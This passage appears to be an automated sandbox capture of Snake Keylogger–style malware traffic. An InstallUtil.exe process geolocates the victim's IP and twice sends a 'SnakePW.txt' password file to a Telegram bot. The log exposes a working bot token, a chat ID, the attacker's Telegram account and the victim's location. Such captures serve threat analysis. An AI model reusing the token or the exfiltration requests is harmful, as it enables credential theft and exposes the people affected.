2024-11-05 10:05:16 UTC	213	IN	Data Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49837	149.154.167.220	443	7776	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:05:16 UTC	358	OUT	POST /bot6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE/sendDocument?chat_id=5302361040&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfe6ad1716199 Host: api.telegram.org Content-Length: 570 Connection: Keep-Alive
2024-11-05 10:05:16 UTC	570	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 65 36 61 64 31 37 31 36 31 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 33 36 37 32 30 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 30 34 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcfe6ad1716199Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:536720Date and Time: 05/11/2024 / 05:04:48Client
2024-11-05 10:05:17 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 05 Nov 2024 10:05:16 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-05 10:05:17 UTC	520	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 34 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 34 33 31 36 30 39 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 79 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 61 79 31 6f 64 6e 64 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 33 30 32 33 36 31 30 34 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 72 61 68 6b 61 73 68 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 72 68 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 72 78 66 76 79 77 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 38 30 31 31 31 36 2c 22 64 6f 63 75 6d 65 6e Data Ascii: {"ok":true,"result":{"message_id":8470,"from":{"id":6843160964,"is_bot":true,"first_name":"May1","username":"may1odndbot"},"chat":{"id":5302361040,"first_name":"Prahkash","last_name":"Brha","username":"trxfvyw","type":"private"},"date":1730801116,"documen

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49844	188.114.96.3	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:05:17 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-05 10:05:17 UTC	1221	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:17 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21795 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bsVDnnJh1wUFJXN62rS1q560IbH%2FRucBwf47sd2mL6gtlBdQ5IROPFol2oJ3M%2BwmFBXMgklbm9iJjq01pWhIJMn7GNza6p1ufvcw4RLfhQJ6TKTPCCuKii%2BBrxZr7%2FQX70FcpiO%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc064a8ddc0b82-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1296&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2198936&cwnd=251&unsent_bytes=0&cid=0554ea2b8f278cd7&ts=143&x=0"
2024-11-05 10:05:17 UTC	148	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
2024-11-05 10:05:17 UTC	211	IN	Data Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49856	188.114.97.3	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:05:19 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-05 10:05:19 UTC	1215	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:19 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21797 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2FFtWCkGbE1W6qApHfFGVUettRiZVAsZ8Ly4gS1dg7l9je0ulKxpyWD9FjuFnMr%2FMur4ewbHwmZVK6x%2Bj6OJLIkJZzh371fNiOdIKFxE1nJ3HLDEjFJZFOCp6vJI4WwlJWx0kOj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc0654ca36e7bb-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1304&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2217457&cwnd=251&unsent_bytes=0&cid=07da9b506558f672&ts=145&x=0"
2024-11-05 10:05:19 UTC	154	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
2024-11-05 10:05:19 UTC	205	IN	Data Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49868	188.114.97.3	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:05:21 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-05 10:05:21 UTC	1217	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:21 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21799 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGxjt%2BgGTmU4rgLrGAriCh8fXyBYfeM6991sBzKFrcwTLJGfMFK1c1fr3iV5y5OmM8L23ZMJ3T%2Fs0%2FB8ZxlAjVhAykKaUhwPhrYft6iZbwgeIwAqQI4Lhno4Oh3GAgKE8xsYYQi1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc065eeccc2c98-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1333&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2093998&cwnd=238&unsent_bytes=0&cid=053b5984dd46b1cf&ts=143&x=0"
2024-11-05 10:05:21 UTC	152	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
2024-11-05 10:05:21 UTC	207	IN	Data Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49880	188.114.97.3	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:05:22 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-05 10:05:22 UTC	1217	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:22 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21800 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJWrip1ecOhH81%2BqV7WFTTr3Fmcs1axsGxeyJWGlVRGmIhaxIuJwOXhHB6wjj%2BzWIe%2B9UMkT1NvLF2SPWdUC0jNU1UNaTqQYd5vXFdB4e3sWi9fPX7jhHL5GGQwBy3q0dTLxcyqA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc066948b33159-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1369&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2045197&cwnd=234&unsent_bytes=0&cid=ca9925267e7f183c&ts=171&x=0"
2024-11-05 10:05:22 UTC	152	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
2024-11-05 10:05:22 UTC	207	IN	Data Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49891	188.114.97.3	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:05:24 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-05 10:05:24 UTC	1215	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 10:05:24 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: f48db563-38bd-42a9-b63a-818418801715 x-amzn-trace-id: Root=1-672998ba-34f2a3590ffa8780419fc51a;Parent=6cafe5a34f751c8d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 86117dda17514641fed3de3744ba683c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: Td8S9lDWOC33K3UrECn1ULteCcA3AUThIsZpaBIoj5aa5ts6rfIIBA== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21802 Last-Modified: Tue, 05 Nov 2024 04:02:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Syy1Z05xwmtGjI5jFZ4M9qxmLJtCcLU%2FArXblmINhOBnGdixypDNvEyFNwN82lTezWIyW3qh63yJ2O5OHgY3iP%2F4uXRcGP7SdA4PSXtP3FqsY3x2TgnFxZrdlBFfw4AWKCMbG2h"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddc0674db4e0bbb-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1852847&cwnd=251&unsent_bytes=0&cid=f90db1c34e2e2450&ts=142&x=0"
2024-11-05 10:05:24 UTC	154	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 Data Ascii: <Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
2024-11-05 10:05:24 UTC	205	IN	Data Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49922	149.154.167.220	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 10:05:30 UTC	358	OUT	POST /bot6843160964:AAF3CXe6SpPYlr6PSxsfXFuMMbuXMIkkNtE/sendDocument?chat_id=5302361040&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfe16f480c19b Host: api.telegram.org Content-Length: 570 Connection: Keep-Alive
2024-11-05 10:05:30 UTC	570	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 65 31 36 66 34 38 30 63 31 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 33 36 37 32 30 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 35 31 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcfe16f480c19bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:536720Date and Time: 05/11/2024 / 06:52:51Client
2024-11-05 10:05:31 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 05 Nov 2024 10:05:31 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
